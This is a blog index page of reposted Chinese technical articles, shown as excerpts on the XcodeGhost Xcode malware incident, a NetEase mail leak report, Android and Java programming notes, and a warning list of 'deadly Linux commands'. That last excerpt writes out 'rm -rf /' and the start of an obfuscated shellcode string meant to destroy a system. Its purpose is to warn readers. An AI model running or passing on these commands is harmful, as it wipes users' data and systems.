XcodeGhost病毒

发表于 安全 分类,标签: XcodeGhost病毒源码病毒
转载自:http://drops.wooyun.org/news/8864 Xcode编译器里有鬼–XcodeGhost样本分析Xcode编译器里有鬼–XcodeGhost样本分析蒸米 · 2015/09/1717:43作者:蒸米,迅迪@阿里移动安全0x00序事情的起因是@唐巧_boy在微博上发了一条微博说到:一个朋友告诉我他们通过在非官方渠道下载的Xcode编译出来的app被注入了第三方的代码,会向一个网站上传数据,目前已知两个知名的App被注入。随后很多留言的小伙伴们纷纷表示中招,@谁敢乱说话表示:”还是不能相信迅雷,我是把官网上的下载URL复制到迅雷里下载的,还是中招了。我说一下:有问题的Xcode6.4.dmg的sha1是:a836d8fa0fce198e061b7b38b826178b44c053a8,官方正确的是:672...

网易邮箱数据库泄露

发表于 安全 分类,标签: 安全网易邮箱数据库
转载自:http://www.huxiu.com/article/128640/1.html?f=index_feed_article 更新:网易邮箱辟谣“信息泄露”说,反打脸乌云#已经看不太懂了参考资料:http://www.wooyun.org/bugs/wooyun-2015-0147763在刚刚,网易邮箱官方微博@网易免费邮箱发出一条置顶的辟谣微博:同时也贴出长微博解释数据泄露一事:————————————我是华丽的更新分割线——————————————昨日(10月18日)开始,有不少网友在微博上反映称网易邮箱内容遭到泄露,虎嗅也在第一时间跟进了报道,文章中提到:除了邮箱之外,包括苹果AppleID、微博、支付宝、百度云盘、游戏等均遭到泄露。有不少iPhone手机用户表示,自己使用网易邮箱绑定AppleID的手机已经被锁,并被擦除数据。对此有苹果用户进行了求证,表示...

Android重力感应开发

发表于 Android 分类,标签:
转自http://blog.csdn.net/mad1989/article/details/20848181一、手机中常用的传感器在Android2.3gingerbread系统中,google提供了11种传感器供应用层使用,具体如下:(Sensor类)#defineSENSOR_TYPE_ACCELEROMETER1//加速度#defineSENSOR_TYPE_MAGNETIC_FIELD2//磁力#defineSENSOR_TYPE_ORIENTATION3//方向#defineSENSOR_TYPE_GYROSCOPE4//陀螺仪#defineSENSOR_TYPE_LIGHT5//光线感应#defineSENSOR_TYPE_PRESSURE6//压力#defineSENSOR_TYPE_TEMPERATURE7//温度#defin...

Android View 绘制机制

发表于 Android 分类,标签: AndroidView
转自http://codekk.com/open-source-project-analysis/detail/Android/lightSky/%E5%85%AC%E5%85%B1%E6%8A%80%E6%9C%AF%E7%82%B9%E4%B9%8B%20View%20%E7%BB%98%E5%88%B6%E6%B5%81%E7%A8%8BView绘制机制1.View树的绘图流程当Activity接收到焦点的时候,它会被请求绘制布局,该请求由Androidframework处理.绘制是从根节点开始,对布局树进行measure和draw。整个View树的绘图流程在ViewRoot.java类的performTraversals()函数展开,该函数所做的工作可简单概况为是否需要重新计算视图大小(measure)、是否需要重新安置视图的位置(layout)、以及...

Android 中查看内存的使用情况集常用adb命令

发表于 Android 分类,标签: 内存dumpsysadb
转自http://blog.csdn.net/bigconvience/article/details/355539831.在IDE中查看Log信息当程序运行垃圾回收的时候,会打印一条Log信息,其格式如下:D/dalvikvm:<GC_Reason><Amount_freed>,<Heap_stats>,<External_memory_stats>,<Pause_time>GC_Reason表示导致垃圾回收的原因以及当前的回收类型,包括以下几类:   GC_CONCURRENT:当堆中对象数量达到一定是触发的垃圾收集   GC_FOR_MALLOC:在内存已满的情况下分配内存,此时系统会暂停程序并回收内存   GC_H...

知乎奇文!一本关于程序员的修真小说

发表于 杂谈 分类,标签:
转自http://mp.weixin.qq.com/s?__biz=MjM5OTMxMzA4NQ==&mid=217181986&idx=2&sn=f43abf90854d8f08dd0af75bc8818e20&scene=5#rd知乎原文http://www.zhihu.com/question/32422838前导语:本文产生自知乎一话题“怎么写出一本程序员风格的修真小说?”,于是乎有了下面这篇程序员修真奇文,现分享出来,以待各位看官共赏~终有一天我手中的编译器将成为我灵魂的一部分,这世界在我的眼中将被代码重构,我将看到山川无尽银河无垠都汇成二进制的数字河流,过往英雄都在我脑海眼前一一浮现,而我听到无数码农跪倒在我的程序面前呼喊。他们叫我代码之神。到那个时候,我想我一定可以找回你。一丶这是一个属于代码的修真世界。这世界里的每一个人,每一个东西,包括...

aapt命令查看apk包名、主activity、版本等

发表于 Android 分类,标签: aapt包名apk
转自http://blog.csdn.net/g19920917/article/details/202449371. aaptl[ist][-v][-a]file.{zip,jar,apk}  ListcontentsofZip-compatiblearchive.1.1列出压缩文件目录aaptl<file_path.apk>参数:-v:会以table的形式输出目录,table的表目有:Length、Method、Size、Ratio、Date、Time、CRC-32、Name。其中Method表示压缩形式,有:Deflate及Stored两种,即该Zip目录采用的算法是压缩模式还是存储模式;可以看出resources.arsc、*.png采用压缩模式,而其它采用压缩模式。Ratio表示压缩率。CRC-32未明其意,S...

java字符编码转换研究(转)

发表于 Java 分类,标签: 编码转换
转自:http://www.cnblogs.com/lxzh/archive/2012/05/30/2526557.html1.概述本文主要包括以下几个方面:编码基本知识,java,系统软件,url,工具软件等。在下面的描述中,将以"中文"两个字为例,经查表可以知道其GB2312编码是"d6d0cec4",Unicode编码为"4e2d6587",UTF编码就是"e4b8ade69687"。注意,这两个字没有iso8859-1编码,但可以用iso8859-1编码来"表示"。2.编码基本知识最早的编码是iso8859-1,和ascii编码相似。但为了方便表示各种各样的语言,逐渐出现了很多标准编码,重要的有如下几个。2.1.iso8859-1属于单字节编码,最多能表示的字符范围是0-...

JAVA wait(), notify(),sleep详解

发表于 Java 分类,标签: java同步
转自http://blog.csdn.net/zyplus/article/details/6672775在JAVA中,是没有类似于PV操作、进程互斥等相关的方法的。JAVA的进程同步是通过synchronized()来实现的,需要说明的是,JAVA的synchronized()方法类似于操作系统概念中的互斥内存块,在JAVA中的Object类型中,都是带有一个内存锁的,在有线程获取该内存锁后,其它线程无法访问该内存,从而实现JAVA中简单的同步、互斥操作。明白这个原理,就能理解为什么synchronized(this)与synchronized(staticXXX)的区别了,synchronized就是针对内存区块申请内存锁,this关键字代表类的一个对象,所以其内存锁是针对相同对象的互斥操作,而static成员属于类专有,其内存空间为该类所有成员共有,这就导...

致命的 Linux 命令

发表于 Linux 分类,标签: linux破坏致命
转自http://blog.sina.com.cn/s/blog_54c5f9c50100gce9.html如果你是一个Linux新手,在好奇心的驱使下,可能会去尝试从各个渠道获得的命令。以下是7个致命的Linux命令,轻则使你的数据造成丢失,重则使你的系统造成瘫痪,所以,你应当竭力避免在系统中运行它们。rm-rf/此命令将递归并强制删除/目录下的所有文件。char esp[] __attribute__ ((section(".text"))) = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68""\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"...